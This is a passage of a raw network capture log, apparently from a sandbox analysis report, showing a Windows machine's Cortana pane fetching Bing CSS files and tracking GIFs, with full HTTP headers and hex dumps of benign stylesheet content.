                                                                                                              report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
                                                                                                              Cache-Control: public, max-age=394576
                                                                                                              Expires: Wed, 30 Oct 2024 09:58:42 GMT
                                                                                                              Date: Fri, 25 Oct 2024 20:22:26 GMT
                                                                                                              Content-Length: 5983
                                                                                                              Connection: close
                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                              Akamai-GRN: 0.8a200117.1729887746.3a616550
                                                                                                              Timing-Allow-Origin: *
                                                                                                              2024-10-25 20:22:26 UTC5983INData Raw: 2e 62 5f 73 65 61 72 63 68 62 6f 78 53 75 62 6d 69 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 72 70 2f 34 69 5a 49 7a 5f 6f 41 4c 31 79 70 37 64 69 5f 36 44 39 65 32 65 6e 58 69 4d 4d 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 2d 34 32 70 78 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 33 32 30 70 78 20 33 38 70 78 7d 2e 62 5f 6c 6f 67 6f 7b 77 69 64 74 68 3a 32 32 70 78 3b 68 65 69 67 68 74 3a 33 37 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 62 5f 6c 6f 67 6f 3a 61 66 74 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 64
                                                                                                              Data Ascii: .b_searchboxSubmit{background:url(/rp/4iZIz_oAL1yp7di_6D9e2enXiMM.png) no-repeat -42px 0;background-size:320px 38px}.b_logo{width:22px;height:37px;position:relative;display:inline-block;overflow:hidden;direction:ltr}.b_logo:after{position:absolute;top:0;d


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              19192.168.2.164972423.1.33.206443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:27 UTC780OUTGET /rb/3F/ortl,cc,nc/4-xJy3tX6bM2BGl5zKioiEcQ1TU.css?bu=A4gCjAKPAg&or=w HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: r.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
                                                                                                              2024-10-25 20:22:27 UTC1211INHTTP/1.1 200 OK
                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                              Server: Kestrel
                                                                                                              Access-Control-Allow-Headers: *
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Last-Modified: Thu, 07 Dec 2023 22:46:03 GMT
                                                                                                              X-EventID: 66e2ba79b3f5496383449854055460e1
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-AS-InstrumentationOptions: AppServerLoggingMaster=1
                                                                                                              X-AS-MACHINENAME: BNZEEAP0002305F
                                                                                                              X-AS-SuppressSetCookie: 1
                                                                                                              X-XSS-Protection: 0
                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                              nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
                                                                                                              report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
                                                                                                              Cache-Control: public, max-age=184444
                                                                                                              Expires: Sun, 27 Oct 2024 23:36:31 GMT
                                                                                                              Date: Fri, 25 Oct 2024 20:22:27 GMT
                                                                                                              Content-Length: 15967
                                                                                                              Connection: close
                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                              Akamai-GRN: 0.95200117.1729887747.412fae3f
                                                                                                              Timing-Allow-Origin: *
                                                                                                              2024-10-25 20:22:27 UTC15173INData Raw: 68 74 6d 6c 7b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 62 6f 64 79 5b 64 69 72 5d 20 74 61 62 6c 65 2c 62 6f 64 79 5b 64 69 72 5d 20 74 64 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 53 61 6e 73 2d 53 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 62 6f 64 79 5b 64 69 72 5d 7b 6d 61 72 67 69 6e 3a 30 7d 62 6f 64 79 20 2e 74 61 6c 6c 55 78 7b
                                                                                                              Data Ascii: html{-ms-user-select:none;overflow-y:hidden;overflow-x:hidden;cursor:default}body[dir] table,body[dir] td{margin:0;padding:0}body{font-size:15px;line-height:20px;font-family:"Segoe UI",Arial,Helvetica,Sans-Serif;color:#000}body[dir]{margin:0}body .tallUx{
                                                                                                              2024-10-25 20:22:27 UTC794INData Raw: 6f 74 28 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 29 3a 6e 6f 74 28 2e 63 6f 72 74 61 6e 61 49 63 6f 6e 29 20 2e 69 63 6f 6e 20 69 6d 67 7b 77 69 64 74 68 3a 31 33 70 78 3b 68 65 69 67 68 74 3a 31 33 70 78 7d 2e 61 73 50 61 64 64 69 6e 67 20 2e 64 6f 75 62 6c 65 4c 69 6e 65 20 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 3e 2e 69 63 6f 6e 7b 6d 69 6e 2d 77 69 64 74 68 3a 34 34 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 34 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 70 78 7d 62 6f 64 79 5b 64 69 72 5d 20 2e 61 73 50 61 64 64 69 6e 67 20 2e 64 6f 75 62 6c 65 4c 69 6e 65 20 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 3e 2e 69 63 6f 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 36 70 78 7d 2e 61 73 50 61 64 64 69 6e 67 20 2e 6e 6f 72 6d 61 6c 69 7a 65 64 42 69
                                                                                                              Data Ascii: ot(.secondaryIcon):not(.cortanaIcon) .icon img{width:13px;height:13px}.asPadding .doubleLine .secondaryIcon>.icon{min-width:44px;min-height:44px;max-height:44px}body[dir] .asPadding .doubleLine .secondaryIcon>.icon{padding-top:6px}.asPadding .normalizedBi


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              20192.168.2.164972523.1.33.206443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:28 UTC913OUTGET /rb/6k/cir3,ortl,cc,nc/kMuSwIezxCpzqkuspnuwJzXKYu0.css?bu=M8IKvArICrwKrAu8CrILvAq8CrwKvQu8CsQLvArKC7wK0Au8CtYLvAraCrwK4Aq8CtQKvAq8CqMLvArvCrwK9Qq8CukKvAq8CoULiAu8CrwKoAuOC7wKlAuXC7wKggy8CtwLvAqwDA&or=w HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: r.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
                                                                                                              2024-10-25 20:22:28 UTC1247INHTTP/1.1 200 OK
                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                              Server: Kestrel
                                                                                                              Access-Control-Allow-Headers: *
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Last-Modified: Wed, 09 Oct 2024 05:33:21 GMT
                                                                                                              X-EventID: 67106c38f5e0446693eb70fcc6aed82a
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-AS-InstrumentationOptions: AppServerLoggingMaster=1
                                                                                                              X-AS-MACHINENAME: BNZEEAP00016A30
                                                                                                              X-AS-SuppressSetCookie: 1
                                                                                                              X-XSS-Protection: 0
                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                              nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
                                                                                                              report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
                                                                                                              Cache-Control: public, max-age=60678
                                                                                                              Expires: Sat, 26 Oct 2024 13:13:46 GMT
                                                                                                              Date: Fri, 25 Oct 2024 20:22:28 GMT
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Connection: Transfer-Encoding
                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                              Akamai-GRN: 0.8a200117.1729887748.3a61710a
                                                                                                              Timing-Allow-Origin: *
                                                                                                              2024-10-25 20:22:28 UTC15137INData Raw: 30 30 30 30 36 30 30 30 0d 0a 40 6b 65 79 66 72 61 6d 65 73 20 61 6c 67 6f 50 6c 61 63 65 68 6f 6c 64 65 72 53 68 69 6d 6d 65 72 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 30 30 25 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 2d 6d 6f 7a 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a
                                                                                                              Data Ascii: 00006000@keyframes algoPlaceholderShimmer{0%{transform:translateX(-100%)}100%{transform:translateX(100%)}}@keyframes fadein{0%{opacity:0}100%{opacity:1}}@-moz-keyframes fadein{0%{opacity:0}100%{opacity:1}}@-o-keyframes fadein{0%{opacity:0;}100%{opacity:
                                                                                                              2024-10-25 20:22:28 UTC9451INData Raw: 65 6e 75 2d 69 74 65 6d 5f 64 65 74 61 69 6c 73 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 38 70 78 7d 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 2e 63 6f 6e 74 65 78 74 4d 65 6e 75 20 2e 6d 65 6e 75 2d 69 74 65 6d 5f 64 65 74 61 69 6c 73 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 38 70 78 7d 2e 63 6f 6e 74 65 78 74 4d 65 6e 75 20 2e 64 69 76 69 64 65 72 7b 62 6f 72 64 65 72 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 62 6f 64 79 5b 64 69 72 5d 20 2e 63 6f 6e 74 65 78 74 4d 65 6e 75 20 2e 64 69 76 69 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 34 70 78 20 31 32 70 78 7d 2e 64 61 72 6b 54 68 65 6d 65 20 2e 63 6f 6e 74 65 78 74 4d 65 6e 75 20 2e 64 69 76
                                                                                                              Data Ascii: enu-item_details{padding-left:28px}body[dir='rtl'] .contextMenu .menu-item_details{padding-right:28px}.contextMenu .divider{border:0;border-top:1px solid rgba(0,0,0,.2)}body[dir] .contextMenu .divider{padding:0;margin:4px 12px}.darkTheme .contextMenu .div
                                                                                                              2024-10-25 20:22:28 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 33 36 70 78 20 2b 20 31 32 70 78 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 7d 62 6f 64 79 5b 64 69 72 5d 20 23 6c 6f 61 64 69 6e 67 53 63 72 65 65 6e 2c 62 6f 64 79 5b 64 69 72 5d 20 23 63 6f 70 69 6c 6f 74 4c 6f 61 64 69 6e 67 53 63 72 65 65 6e 7b 6d 61 72 67 69 6e 3a 31 32 70 78 20 31 32 70 78 20 30 20 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 32 70 78 7d 2e 64 61 72 6b 54 68 65 6d 65 20 23 6c 6f 61 64 69 6e 67 53 63 72 65 65 6e 2c 2e 64 61 72 6b 54 68 65 6d 65 20 23 63 6f 70 69 6c 6f 74 4c 6f 61 64 69 6e 67 53 63 72 65 65 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                              Data Ascii: 00006000t:calc(100% - 36px + 12px);background-color:#fff;box-sizing:content-box}body[dir] #loadingScreen,body[dir] #copilotLoadingScreen{margin:12px 12px 0 12px;padding-top:12px}.darkTheme #loadingScreen,.darkTheme #copilotLoadingScreen{background-color
                                                                                                              2024-10-25 20:22:28 UTC8204INData Raw: 3a 6e 6f 6e 65 7d 62 6f 64 79 5b 64 69 72 3d 27 6c 74 72 27 5d 20 2e 74 6f 70 52 65 73 75 6c 74 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 2e 74 6f 70 52 65 73 75 6c 74 54 65 6d 70 6c 61 74 65 49 6e 47 72 6f 75 70 73 20 2e 73 75 67 67 44 65 74 61 69 6c 73 43 6f 6e 74 61 69 6e 65 72 2c 62 6f 64 79 5b 64 69 72 3d 27 6c 74 72 27 5d 20 2e 74 6f 70 52 65 73 75 6c 74 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 2e 77 69 74 68 4f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 20 2e 73 75 67 67 44 65 74 61 69 6c 73 43 6f 6e 74 61 69 6e 65 72 2c 62 6f 64 79 5b 64 69 72 3d 27 6c 74 72 27 5d 20 2e 67 72 6f 75 70 20 2e 74 6f 70 52 65 73 75 6c 74 54 65 6d 70 6c 61 74 65 49 6e 47 72 6f 75 70 73 2e 73 75 67 67 65 73 74 69 6f 6e 2e 77 69 74 68 4f 70 65 6e 50 72 65 76 69 65 77
                                                                                                              Data Ascii: :none}body[dir='ltr'] .topResults .suggestion.topResultTemplateInGroups .suggDetailsContainer,body[dir='ltr'] .topResults .suggestion.withOpenPreviewPaneBtn .suggDetailsContainer,body[dir='ltr'] .group .topResultTemplateInGroups.suggestion.withOpenPreview
                                                                                                              2024-10-25 20:22:28 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 2c 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 20 2e 70 72 65 76 69 65 77 4f 70 65 6e 65 64 49 63 6f 6e 2c 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 20 2e 6f 70 65 6e 50 72 65 76 69 65 77 49 63 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 70 72 65 76 69 65 77 50 61 6e 65 4f 70 65 6e 65 64 20 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 2c 2e 70 72 65 76 69 65 77 50 61 6e 65 4f 70 65 6e 69 6e 67 20 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e
                                                                                                              Data Ascii: 00004000,.openPreviewPaneBtn{align-items:center;justify-content:center}.openPreviewPaneBtn .previewOpenedIcon,.openPreviewPaneBtn .openPreviewIcon{display:none}.previewPaneOpened .openPreviewPaneBtn,.previewPaneOpening .openPreviewPaneBtn{display:none}.
                                                                                                              2024-10-25 20:22:28 UTC12INData Raw: 65 79 66 72 61 6d 65 73 20 66 0d 0a
                                                                                                              Data Ascii: eyframes f
                                                                                                              2024-10-25 20:22:28 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 2d 6d 6f 7a 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 6f 6f 70 69 6e 67 52 6f 74 61 74 65 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 20
                                                                                                              Data Ascii: 00004000adein{0%{opacity:0}100%{opacity:1}}@-moz-keyframes fadein{0%{opacity:0}100%{opacity:1}}@-o-keyframes fadein{0%{opacity:0;}100%{opacity:1;}}@-webkit-keyframes fadein{0%{opacity:0}100%{opacity:1}}@keyframes loopingRotate{0%{transform:rotate(0deg)
                                                                                                              2024-10-25 20:22:28 UTC12INData Raw: 75 73 61 62 6c 65 29 7b 62 6f 0d 0a
                                                                                                              Data Ascii: usable){bo
                                                                                                              2024-10-25 20:22:28 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 63 63 65 6e 74 31 29 7d 23 72 6f 6f 74 3a 6e 6f 74 28 2e 77 69 6e 31 31 29 3a 6e 6f 74 28 2e 66 69 6c 65 45 78 70 6c 6f 72 65 72 29 3a 6e 6f 74 28 2e 7a 65 72 6f 49 6e 70 75 74 31 39 48 31 29 20 2e 67 72 6f 75 70 43 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 61 62 6c 65 2e 73 75 67 67 65 73 74 69 6f 6e 2e 61 72 72 6f 77 4f 72 54 61 62 41 63 74 69 6f 6e 2e 73 61 5f 68 76 3a 6e 6f 74 28 2e 66 6f 63 75 73 61 62 6c 65 29 3a 68 6f 76 65 72 2c 23 72 6f 6f 74 3a 6e 6f 74 28 2e 77 69 6e 31 31 29 3a 6e 6f 74 28 2e 66 69 6c 65 45 78 70 6c 6f 72 65 72 29 3a 6e 6f 74 28 2e 7a
                                                                                                              Data Ascii: 00006000rder-color:#000;outline:none;background-color:var(--accent1)}#root:not(.win11):not(.fileExplorer):not(.zeroInput19H1) .groupContainer .selectable.suggestion.arrowOrTabAction.sa_hv:not(.focusable):hover,#root:not(.win11):not(.fileExplorer):not(.z
                                                                                                              2024-10-25 20:22:28 UTC8204INData Raw: 72 6f 75 70 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 3a 68 6f 76 65 72 20 2e 73 65 63 6f 6e 64 61 72 79 4d 65 74 61 64 61 74 61 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 62 6f 64 79 5b 64 69 72 5d 20 2e 66 6c 61 74 4c 69 73 74 57 69 74 68 6f 75 74 47 72 6f 75 70 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 20 2e 73 65 63 6f 6e 64 61 72 79 54 65 78 74 3a 6e 6f 74 28 2e 73 65 63 6f 6e 64 61 72 79 4d 65 74 61 64 61 74 61 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 2e 66 6c 61 74 4c 69 73 74 57 69 74 68 6f 75 74 47 72 6f 75 70 73 20 2e 73 75 67 67 65 73 74 69 6f 6e 20 2e 73 65 63 6f 6e 64 61 72 79 54 65 78 74 3a 6e 6f 74 28 2e 73 65 63 6f 6e 64 61 72 79 4d 65 74 61 64 61 74 61 29 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 20 2d 20 22 7d
                                                                                                              Data Ascii: roups .suggestion:hover .secondaryMetadata{margin-right:auto}body[dir] .flatListWithoutGroups .suggestion .secondaryText:not(.secondaryMetadata){margin-top:2px}.flatListWithoutGroups .suggestion .secondaryText:not(.secondaryMetadata):before{content:" - "}


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              21192.168.2.1649726150.171.73.254443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:28 UTC482OUTGET /apc/trans.gif?58491551ead6717ca8953d4619f8959a HTTP/1.1
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                                                                                                              Accept-Language: en-CH
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: bx-ring.msedge.net
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-10-25 20:22:28 UTC710INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                              Content-Length: 43
                                                                                                              Content-Type: image/gif
                                                                                                              Last-Modified: Mon, 07 Oct 2024 03:46:52 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName
                                                                                                              Timing-Allow-Origin: *
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Endpoint: DFW31r5a
                                                                                                              X-Frontend: AFD
                                                                                                              X-Machinename: DFW311000110017
                                                                                                              X-Userhostaddress: 173.254.250.0
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              X-MSEdge-Ref: Ref A: 85A4AA535BAF4E47A128D17D6B1EE470 Ref B: DFW311000110017 Ref C: 2024-10-25T20:22:28Z
                                                                                                              Date: Fri, 25 Oct 2024 20:22:28 GMT
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:22:28 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              22192.168.2.1649727150.171.73.254443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:29 UTC482OUTGET /apc/trans.gif?0bb944ce9eb8ccf482ff8db3c89d41d7 HTTP/1.1
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
                                                                                                              Accept-Language: en-CH
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: bx-ring.msedge.net
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-10-25 20:22:29 UTC710INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                              Content-Length: 43
                                                                                                              Content-Type: image/gif
                                                                                                              Last-Modified: Mon, 07 Oct 2024 03:46:52 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName
                                                                                                              Timing-Allow-Origin: *
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Endpoint: DFW31r5b
                                                                                                              X-Frontend: AFD
                                                                                                              X-Machinename: DFW311000103023
                                                                                                              X-Userhostaddress: 173.254.250.0
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              X-MSEdge-Ref: Ref A: F1690BBD67BE4A47AEB6029D452593ED Ref B: DFW311000103023 Ref C: 2024-10-25T20:22:29Z
                                                                                                              Date: Fri, 25 Oct 2024 20:22:29 GMT
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:22:29 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              23192.168.2.164972823.1.33.206443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:29 UTC774OUTGET /rb/6k/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AbwK&or=w HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept-Encoding: gzip, deflate, br
